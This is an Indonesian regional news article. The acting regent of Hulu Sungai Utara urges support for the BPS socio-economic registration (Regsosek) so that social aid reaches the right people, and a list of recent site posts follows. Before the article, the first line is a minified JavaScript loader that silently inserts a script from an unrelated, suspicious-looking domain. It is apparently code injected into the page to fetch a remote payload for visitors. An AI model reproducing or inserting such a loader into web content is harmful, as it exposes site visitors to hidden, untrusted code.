(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Hulu Sungai Utara

Plt Bupati HSU Harap Program Regsosek Bantu Program Pemerintah Lebih Terarah


KANALKALIMANTAN.COM, AMUNTAI – Plt Bupati Hulu Sungai Utara (HSUH Husairi Abdi, mengharapkan adanya Registrasi Sosial Ekonomi (Regsosek) dari Badan Pusat Statistik (BPS) akan menghasilkan data terpadu, sehingga kebijakan pemerintah lebih terarah dan tepat sasaran.

Hal tersebut diungkapkan Husairi saat hadir dalam rapat koordinasi (Rakor)  bersama BPS Kabupaten HSU, dalam agenda pendataan awal Regsosek satu data perlindungan sosial dan pemberdayaan masyarakat, di Mess Nagara Dipa Selasa, (20/9/2022).

“Dengan adanya Regsosek nantinya menghasilkan data terpadu, tidak hanya untuk perlindungan sosial saja akan tetapi keseluruhan program yang dibutuhkan masyarakat,” ungkap Husairi di hadapan Forkopimda, Kepala SKPD, para Camat, Lurah serta Kepala Desa se kabupaten HSU.

Husairi menyebut, rakor Regsosek ini sebagai upaya pemerintah menghadirkan data yang komprehensif. Juga mempermudah para pengguna data yang ingin memanfaatkan guna pembangunan Kalimantan Selatan, khususnya Kabupaten HSU.

 

Baca juga  : Tolak Kenaikan BBM hingga Naikkan UMP, Buruh Unjuk Rasa di DPRD Kalsel

Menurut Husairi, kolaborasi Pemkab HSU dengan BPS harus terus ditingkatkan mengingat data sosial ekonomi sangat diperlukan dalam rangka pembangunan masyarakat Kalimantan Selatan yang berkelanjutan.

“Saat ini dengan kondisi global yang tidak menentu dan menyebabkan inflasi di berbagai daerah serta kenaikan harga BBM, pelaksanaan perlindungan sosial perlu perbaikan ‘Bantuan Sosial’ sebagai bagian dari perlindungan sosial, harus kita salurkan tepat sasaran pada masyarakat yang betul-betul membutuhkan, termasuk yang terdampak pandemi Covid-19,” imbuhnya.

Husairi berharap registrasi sosial ekonomi nantinya akan menghasilkan data terpadu, tidak hanya untuk perlindungan sosial saja, akan tetapi keseluruhan program yang dibutuhkan masyarakat.

“Saya ingin agar instansi pemerintah daerah dapat mendukung dan memberikan fasilitasi terlaksananya pendataan ini,” katanya.

Baca juga  : Mantan Kades Kaburan Jadi Tersangka Korupsi Dana Desa

Sementara kepada BPS, Husairi juga berharap dapat melakukan pendekatan yang humanis dan persuasif kepada masyarakat tentang pentingnya data yang sedang dikumpulkan pada pendataan awal Regsosek ini.

“Jadi lakukan komunikasi terlebih dahulu kepada perangkat desa, kelurahan serta kecamatan agar masyarakat yang akan didata memahami esensi dari pendataan ini sehingga mereka mau menerima petugas dan memberikan jawaban yang sebenar-benarnya,” pungkasnya.(Kanalkalimantan.com/dew)

Reporter  : dew
Editor : cell


Desy Arfianty

Recent Posts

Jalinan Erat Silaturahmi Warga Sungai Besar dari Budaya Banjar “Balogo”

KANALKALIMANTAN.COM, BANJARBARU – Suasana riuh diiringi tawa gembira warga baik tua, muda, hingga anak-anak, larut… Read More

42 menit ago

Pelantikan Pengurus Wilayah Keluarga Besar PII Kalsel

KANALKALIMANTAN.COM, BANJARMASIN – 4 Mei diperingati Hari Bangkit (Harba) organisasi pelajar tertua di Tanah Air,… Read More

2 jam ago

Lesti Kejora Hingga Ria Ricis Siap Ramaikan Silet Awards 2024!

KANALKALIMANTAN.COM, - Ajang penghargaan paling dramatis dan paling sensasional yang ditunggu masyarakat, Silet Awards 2024… Read More

3 jam ago

Kontes Motor 2Tak “Entwosiastrokes Volume 2 2024” di Banjarbaru, Ajang Adu Para Modifikator Banua

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin mengapreasiasi penyelenggaraan event kontes motor "Entwosiastrokes… Read More

4 jam ago

Kali Pertama Airbus A340 Layani Jemaah Haji Embarkasi Banjarmasin

Penerbangan Kloter 1 Sempat Terlambat 30 Menit Read More

7 jam ago

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

10 jam ago

This website uses cookies.